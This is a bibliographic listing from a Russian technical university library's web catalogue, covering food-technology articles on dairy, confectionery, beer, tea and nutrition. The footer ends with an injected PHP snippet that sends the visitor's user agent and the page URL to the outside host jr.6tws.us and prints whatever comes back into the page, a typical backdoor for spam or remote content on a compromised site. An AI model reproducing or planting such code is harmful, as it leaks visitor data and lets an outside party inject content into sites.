  • Колчина, В. А. Обогащение творога фруктовыми наполнителями / В. А. Колчина, И. А. Долматова, Т. Н. Зайцева. - с.38-42
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ТВОРОГ
  • Кольман, О. Я. Инновационные технологии производства мучных кондитерских изделий, обогащенных ягодным порошком / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.42-45
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Кольман, О. Я. Современные индустриальные технологии в производстве кондитерских изделий на ягодной основе / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.46-49
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Корнева, О. С. Статистический анализ стабильности производства пива / О. С. Корнева. - с.49-53
    Кл. слова: ПИВО - ПРОИЗВОДСТВО
  • Корнева, О. С. Управление качеством пива на стадии формирования рынка / О. С. Корнева. - с.54-57
    Кл. слова: ПИВО
  • Коротаева, Т. А. Возможность использования фиников в производстве мучных кондитерских изделий / Т. А. Коротаева. - с.57-58
    Кл. слова: ФИНИКИ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Костюченко, Н. В. Влияние электромагнитной обработки на микроорганизмы / Н. В. Костюченко. - с.59-61
    Кл. слова: ОБРАБОТКА ЭЛЕКТРОМАГНИТНАЯ, МИКРООРГАНИЗМЫ
  • Костенко, Л. Н. Исследование качества чая черного байхового различных производителей / Л. Н. Костенко, О. В. Бессонова. - с.62-64
    Кл. слова: ЧАЙ
  • Кошкин, П. Ю. Перспективы использования пенообразных масс в молочной промышленности / П. Ю. Кошкин. - с.64-67
    Кл. слова: МАССА ПЕНООБРАЗНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Крылова, Л. В. Рекомендации в питании спортсменам-любителям / Л. В. Крылова, В. Н. Понкратов. - с.67-70
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Методика оценки сбалансированности белкового состава многокомпонентных продуктов для школьного питания / ; П. А. Лисин, [и др.]. - с.70-77
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Проектирование поликомпонентных пищевых продуктов с заданным составом и свойствами / ; П. А. Лисин, [и др.]. - с.77-85
    Кл. слова: ПРОДУКТЫ ПИЩЕВЫЕ ПОЛИКОМПОНЕНТНЫЕ
  • Локотченко, Н. С. Проблемы и перспективы разработки низколактозных молочных коктейлей и пенообразующими свойствами / Н. С. Локотченко. - с.85-88
    Кл. слова: КОКТЕЙЛЬ МОЛОЧНЫЙ
  • Лопатинская, Т. В. Продукты питания функционального назначения для детей дошкольного возраста / Т. В. Лопатинская, Д. А. Чистякова, О. Я. Соколова. - с.89-92
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лузан, В. Н. Проектирование продукта на основе рыбного сырья нутриентно-адекватного питанию детей дошкольного возраста / В. Н. Лузан, Л. А. Ключникова, Б. Ш. Цыренжапов. - с.92-99
    Кл. слова: РЫБА - ПИТАНИЕ, ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лукьянюк, Н. В. Современные индустриальные технологии пищевых продуктов / Н. В. Лукьянюк. - с.99-102
    Кл. слова: ЧАЙ
  • Малкова, Н. К. Расширение ассортимента мучных кондитерских изделий повышенной пищевой ценности для сетевого питания / Н. К. Малкова, Л. Г. Ермош. - с.102-105
    Кл. слова: АССОРТИМЕНТ КОНДИТЕРСКИХ ИЗДЕЛИЙ
  • Мусифуллина, Э. В. Яблочные чипсы сублимационной сушки / Э. В. Мусифуллина, Н. В. Макарова, А. Н. Дмитриева. - с.105-109
    Кл. слова: ЧИПСЫ ЯБЛОЧНЫЕ, СУШКА СУБЛИМАЦИОННАЯ
  • Никифорова, Л. М. Заменители мяса, используемые для получения новых видов мясных продуктов / Л. М. Никифорова, О. В. Бессонова. - с.109-112
    Кл. слова: ЗАМЕНИТЕЛЬ МЯСА
  • Паленков, И. А. Разработка системы управления безопасностью и качеством слабоалкогольной газированной продукции / И. А. Паленков, О. В. Пасько. - с.112-120
    Кл. слова: АЛКОГОЛЬ, ПРОДУКЦИЯ СЛАБОАЛЬКОГОЛЬНАЯ
  • Петрова, Е. И. Перспектива расширения ассортимента молочных продуктов для питания спортсменов / Е. И. Петрова. - с.121-124
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Портнягина, В. А. Производство функциональных продуктов для геродиетического питания / В. А. Портнягина. - с.124-126
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Пушмина, И. Н. Формирование подходов к разработке функциональных молокосодержащих продуктов с использованием природных цеолитов / И. Н. Пушмина, А. В. Бауэр. - с.127-128
    Кл. слова: ЦЕОЛИТ ПРИРОДНЫЙ, ПРОДУКЦИЯ МОЛОКОСОДЕРЖАЩАЯ
  • Романишина, Е. Р. Исследование показателей качества и безопасности мясосодержаших полуфабрикатов / Е. Р. Романишина. - с.129-134
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Савинцева, Ю. О. Современные индустриальные технологии пищевых продуктов на ОАО "Омская макаронная фабрика" / Ю. О. Савинцева. - с.134-141
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, ФАБРИКА МАКАРОННАЯ
  • Сапожников, А. Н. Влияние обработки пшеничной муки энергией инфракрасного излучения на сохраняемость хлеба / А. Н. Сапожников, Л. П. Шорникова, С. К. Волончук. - с.141-145
    Кл. слова: МУКА ПШЕНИЧНАЯ, ХЛЕБ
  • Смирнова, Н. А. Разработка стандарта организации "Биопродукт творожный" / Н. А. Смирнова. - с.146-149
    Кл. слова: БИОПРОДУКТ ТВОРОЖНЫЙ
  • Струпан, Е. А. Технология продуктов переработки дикорастущего сырья / Е. А. Струпан, В. С. Колодязная, О. А. Струпан. - с.149-155
    Кл. слова: СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Трофимов, И. Е. Продукты на основе натурального – основа питания спортсмена / И. Е. Трофимов. - с.156-157
    Кл. слова: СЫРЬЕ НАТУРАЛЬНОЕ, ПИТАНИЕ СПОРТСМЕНОВ
  • Троценко, В. В. Повреждение семян зерновых культур при послеуборочной обработке / В. В. Троценко, А. И. Забудский. - с.158-162
    Кл. слова: ЗЕРНО, ГРЕЧИХА
  • Турлубаева, А. Н. Экология и пища / А. Н. Турлубаева, О. Я. Соколова. - с.162-165
    Кл. слова: ПИЩА - ЭКОЛОГИЯ
  • Унжакова, К. С. Медико-биологические аспекты создания продукции геродиетического питания / К. С. Унжакова, М. В. Исаева, О. Я. Соколова. - с.165-168
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Четвертаков, А. А. Расширение ассортимента продукции за счет использования нетрадиционных видов йодосодержащего растительного сырья / А. А. Четвертаков, Г. В. Иванова, С. В. Чехунов. - с.168-171
    Кл. слова: СЫРЬЕ РАСТИТЕЛЬНОЕ ЙОДОСОДЕРЖАЩЕЕ, АССОРТИМЕНТ ПРОДУКЦИИ
  • Чехомова, Е. А. Товароведная оценка сладко-сливочного масла "Крестьянское" / Е. А. Чехомова, И. А. Ивкова. - с.172-174
    Кл. слова: МАСЛО КОРОВЬЕ
  • Щербина, М. О. Сравнительная характеристика качества варенья различных производителей / М. О. Щербина, Е. П. Галкова. - с.175-177
    Кл. слова: ВАРЕНЬЕ
  • Ходырева, Е. И. Проблемы формирования кластеров общественного питания / Е. И. Ходырева. - с.178-184
    Кл. слова: КЛАСТЕР, ПИТАНИЕ ОБЩЕСТВЕННОЕ
Держатели документа (Информация об экземплярах) 
21. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.16 с.20 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;